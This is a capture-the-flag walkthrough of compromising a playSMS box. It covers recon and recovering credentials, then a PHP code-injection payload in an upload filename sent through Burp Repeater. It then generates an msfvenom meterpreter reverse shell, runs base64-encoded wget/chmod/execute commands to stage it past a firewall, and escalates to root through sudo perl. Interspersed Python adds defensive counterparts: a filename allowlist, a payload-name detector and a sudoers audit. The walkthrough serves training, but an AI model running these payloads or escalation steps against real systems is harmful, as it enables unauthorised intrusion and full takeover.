Command injection:
Look at every page that can be browsed, and always read the page source; passwords may turn up there.
In this example, running dirb http://ip finds robots.txt, with the following contents:
Browse all pages and view their source, looking for anything out of the ordinary. The /nothing page returns a hint that differs from the normal 404 error, so examine its source closely.
The source is as follows:
Find the file backup.zip on the site and extract it; the password is one of those seen while browsing earlier, in this case freedom.
The extracted mp3 file is not necessarily an mp3. Run file <filename> to check its type; it is usually a text file.
cat the file to read its contents. The exact commands are:
This reveals a hidden site at /SecreTSMSgatwayLogin, with username touhid and password diana.
Based on the site's name, use searchsploit to look up related vulnerability write-ups, here for playSMS, and read the attack method. This step matters: learning how to use a published exploit is the focus of what follows.
You can also browse the site shown in the image below!
Enter the following command:
root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/42003.txt
1. Description
Unrestricted File Upload:
Any registered user can upload any file because of improper validation of the file in sendfromfile.php
Code Execution using $filename
Now we know sendfromfile.php accepts any file extension and just reads the content, which is not stored on the server. But there is a bug: when a user uploads, for example, mybackdoor.php the server accepts it happily but does not store it in any folder, so our shell is useless. But if the user changes the file name from "mybackdoor.php" to "<?php system('uname -a'); dia();?>.php" then the server checks the file and sets a parameter $filename="<?php system('uname -a'); dia();?>.php"; you can see the code below, and it displays $filename on the page.
For More Details : www.touhidshaikh.com/blog/
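The description above says the handler accepts any file name and later displays $filename, which is what lets a PHP tag in the name reach the interpreter. The following Python is an added example, not playSMS code and not the exploit author's, showing the server-side controls that close that gap: an allowlist check on the client-supplied name, a server-chosen name for the stored copy, and HTML escaping when the name is echoed back. The function names, the regex and the csv-only rule are assumptions made for the example (the upload page on this box only accepts csv).

```python
import html
import os
import re
import secrets

# Allowlist for the client-supplied name (assumption for this example): a
# short alphanumeric base name and exactly one ".csv" extension. PHP tags,
# quotes, spaces, path separators and double extensions all fail the check.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.csv$")


def is_safe_upload_filename(filename: str) -> bool:
    """Return True only if `filename` is a plain CSV name with no path parts."""
    if not filename or os.path.basename(filename) != filename:
        return False
    return SAFE_NAME_RE.fullmatch(filename) is not None


def server_side_name() -> str:
    """Choose the stored file's name ourselves; the client's name is display-only."""
    return "upload_" + secrets.token_hex(8) + ".csv"


def render_upload_notice(filename: str) -> str:
    """Build the 'you uploaded X' message with the name HTML-escaped, so it is
    shown as text and never handed to a template engine or eval as code."""
    return "<p>Uploaded file: " + html.escape(filename, quote=True) + "</p>"


def handle_upload(filename: str) -> dict:
    """Outcome of an upload request carrying `filename` (hypothetical stand-in
    for a send-from-file handler; nothing is written to disk here)."""
    if not is_safe_upload_filename(filename):
        return {"accepted": False, "stored_as": None,
                "notice": "<p>Rejected: file name must be name.csv</p>"}
    return {"accepted": True, "stored_as": server_side_name(),
            "notice": render_upload_notice(filename)}


if __name__ == "__main__":
    for name in ("1.csv", "../1.csv", "1.csv.php",
                 "<?php system('uname -a');die();?>.php"):
        print(repr(name), "->", handle_upload(name))
```

The allowlist rejects the name used in the write-up before it reaches any code path, and because the stored copy gets a server-generated name, the client's name never influences what is written to disk or interpreted.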
Next, exploitation:
Find the "Send from file" page. Since it only accepts csv files, create an empty file 1.csv.
Now configure a proxy in the browser:
Start burpsuite: under proxy, configure the proxy and enable interception.
You should see the following screen, showing the intercepted request.
Send the request via action->repeater.
Under action choose repeater, modify the request in repeater, then submit it to carry out the attack.
Detailed steps:
First configure the proxy in the browser, then select 1.csv on the page.
Start burpsuite, configure the proxy, and turn intercept on.
Click upload on the page; burpsuite intercepts the request. Click "ACTION" and choose "Send to Repeater".
Under the Repeater tab, modify the request: set filename="<?php system('uname -a');die();?>.php"
Click "GO"; if there is no "GO" button, click "SEND".
Check the result in the RESPONSE tab on the right!
Note: to inject another command you must re-upload the file, intercept again, and modify the request again!!!!
You can try other commands such as id.
Going further:
View the msfvenom help:
msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
The available shell file formats are listed as follows:
root@kali:~# msfvenom --list format
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
Generate the reverse shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.10.128 lport=4444 -f elf -o /var/www/html/shell
or:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.10.128 lport=4444 -f elf > /var/www/html/s
Listing the file shows it has no execute permission; add it with chmod +x.
Next idea: have the target download the generated shell, execute it, and connect back to msf.
But the target has a firewall enabled, so you need to know how to get past it.
Be sure to master using base64 to evade the firewall's detection:
Base64-encode the command on the attacking machine; when inserting it in burpsuite, wrap it in base64_decode so it is decoded on the target.
root@kali:~# echo "wget http://10.10.10.128/shell -O /tmp/shell" | base64
d2dldCBodHRwOi8vMTAuMTAuMTAuMTI4L3NoZWxsIC1PIC90bXAvc2hlbGwK
root@kali:~# echo "chmod 777 /tmp/shell" | base64
Y2htb2QgNzc3IC90bXAvc2hlbGwK
root@kali:~# echo "/tmp/shell" | base64
L3RtcC9zaGVsbAo=
Insert each of the base64-encoded command strings above into $filename in turn, wrapped in base64_decode so it is decoded, as follows:
Tip: since several commands must be executed remotely, create several empty files, e.g. 1.csv, 2.csv, 3.csv.
Each time, toggle the browser proxy and burpsuite's intercept on/off. It took me several tries, but it finally worked!!!
Re-upload 1.csv, intercept, choose repeater under action, and under the repeater tab modify the $filename content, using base64_decode() to decode it when submitting:
filename="<?php system(base64_decode('d2dldCBodHRwOi8vMTAuMTAuMTAuMTI4L3NoZWxsIC1PIC90bXAvc2hlbGwK')); dia();?>.php"
Click Send. There will be no visible response.
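To see the same evasion from the defender's side, the following added Python example (not from the original write-up) inspects client-supplied upload file names, decodes any base64_decode('...') argument it finds, and flags PHP tags, exec-style calls and fetch-to-/tmp staging commands, so that the encoded variant is caught as readily as the plain one. The log line format, the regexes and the 10.10.10.130/131 client addresses are constructed for the example; the base64 strings are the ones shown above.

```python
import base64
import binascii
import re
import urllib.parse

PHP_TAG_RE = re.compile(r"<\?php", re.IGNORECASE)
EXEC_CALL_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(")
B64_CALL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# What the decoded text looks like when a binary is fetched into /tmp, made
# executable and run from there (the sequence shown in this write-up).
STAGING_RE = re.compile(r"\b(wget|curl|chmod)\b|(^|\s)/tmp/\S+")
# The field as it appears in a multipart Content-Disposition header or in the
# constructed log lines below.
FILENAME_FIELD_RE = re.compile(r'filename="([^"]*)"')


def decode_b64_args(text: str) -> list:
    """Decode every base64_decode('...') argument in `text`; skip invalid base64."""
    out = []
    for b64 in B64_CALL_RE.findall(text):
        try:
            out.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return out


def inspect_filename(filename: str) -> dict:
    """Classify one client-supplied upload file name."""
    text = urllib.parse.unquote(filename)  # names in logs may be URL-encoded
    reasons = []
    if PHP_TAG_RE.search(text):
        reasons.append("php-tag")
    if EXEC_CALL_RE.search(text):
        reasons.append("exec-call")
    decoded = decode_b64_args(text)
    if decoded:
        reasons.append("base64-argument")
    if any(STAGING_RE.search(cmd) for cmd in decoded):
        reasons.append("staging-command")
    return {"suspicious": bool(reasons), "reasons": reasons,
            "decoded": [d.strip() for d in decoded]}


def scan_upload_log(lines) -> list:
    """Return (line number, inspection) for every line whose filename is flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = FILENAME_FIELD_RE.search(line)
        if not m:
            continue
        result = inspect_filename(m.group(1))
        if result["suspicious"]:
            hits.append((n, result))
    return hits


# Constructed log lines (timestamp, client address, upload file name). The
# client addresses are invented; the payload names are the ones in this write-up.
UPLOAD_LOG = [
    '2024-01-01T10:00:00Z 10.10.10.130 filename="1.csv"',
    '2024-01-01T10:00:05Z 10.10.10.130 filename="<?php system(\'uname -a\');die();?>.php"',
    '2024-01-01T10:00:09Z 10.10.10.130 filename="<?php system(base64_decode('
    '\'d2dldCBodHRwOi8vMTAuMTAuMTAuMTI4L3NoZWxsIC1PIC90bXAvc2hlbGwK\')); dia();?>.php"',
    '2024-01-01T10:00:12Z 10.10.10.131 filename="report-2024.csv"',
]

if __name__ == "__main__":
    for n, result in scan_upload_log(UPLOAD_LOG):
        print(n, result["reasons"], result["decoded"])
```

The point of decoding rather than pattern-matching the base64 text is that the encoded form changes with every command, while the decoded command still reads as a download into /tmp followed by chmod and execution.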
Next, privilege escalation:
sudo -l: look for commands that can be run without the root password; here, perl is found.
sudo perl -e "exec '/bin/sh'"
bash -i: switch to an interactive shell; the root prompt appears.
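The sudo -l step works because perl may be run as root without a password, and an interpreter run as root is a root shell. As an added example (not part of the original write-up), the Python below audits sudoers-style entries, and lines in the form printed by sudo -l, for NOPASSWD grants on shells and scripting interpreters. The sample entries, the entry regex and the interpreter list are constructed assumptions for the example, not taken from the box.

```python
import os
import re

# One sudoers entry, or one line as printed by `sudo -l` (no 'user host=' prefix).
ENTRY_RE = re.compile(
    r"^\s*(?:(?P<user>\S+)\s+(?P<host>\S+)=)?"   # 'user host=' (sudoers file only)
    r"\((?P<runas>[^)]*)\)\s*"                   # (ALL), (root), (ALL:ALL)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                 # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+?)\s*$"
)

# Shells and scripting interpreters: run as root without a password, each one
# is a root shell (the page's case is perl -e "exec '/bin/sh'"). This is an
# assumed list for the example; extend it for the hosts you audit.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "perl",
                "python", "python2", "python3", "ruby"}


def parse_entry(line: str):
    """Parse one entry; return None for comments, Defaults lines and blanks."""
    line = line.split("#", 1)[0]
    m = ENTRY_RE.match(line)
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {"user": m.group("user") or "(current user)",
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in tags,
            "cmds": cmds}


def risky_commands(cmds) -> list:
    """Commands that yield a root shell: 'ALL', or any listed interpreter."""
    out = []
    for c in cmds:
        prog = c.split()[0]
        if prog == "ALL" or os.path.basename(prog) in INTERPRETERS:
            out.append(c)
    return out


def audit(lines) -> list:
    """(user, runas, risky commands) for every NOPASSWD entry that grants a shell."""
    findings = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None or not entry["nopasswd"]:
            continue
        risky = risky_commands(entry["cmds"])
        if risky:
            findings.append((entry["user"], entry["runas"], risky))
    return findings


# Constructed sample entries (not from a real host). The touhid line mirrors
# the situation found on the box; the last line is in `sudo -l` output form.
SUDOERS_SAMPLE = [
    "Defaults env_reset",
    "root    ALL=(ALL:ALL) ALL",
    "touhid  ALL=(ALL) NOPASSWD: /usr/bin/perl",
    "backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar",
    "deploy  ALL=(root) /usr/bin/systemctl restart app",
    "(ALL) NOPASSWD: /usr/bin/python3",
]

if __name__ == "__main__":
    for user, runas, cmds in audit(SUDOERS_SAMPLE):
        print(f"{user} may run {', '.join(cmds)} as ({runas}) without a password")
```

The check only covers shells and interpreters; a NOPASSWD grant on other programs (the rsync and tar line in the sample passes) still deserves a manual look, since the fix in every case is the same: grant the narrowest command that does the job, and require the password unless automation truly needs otherwise.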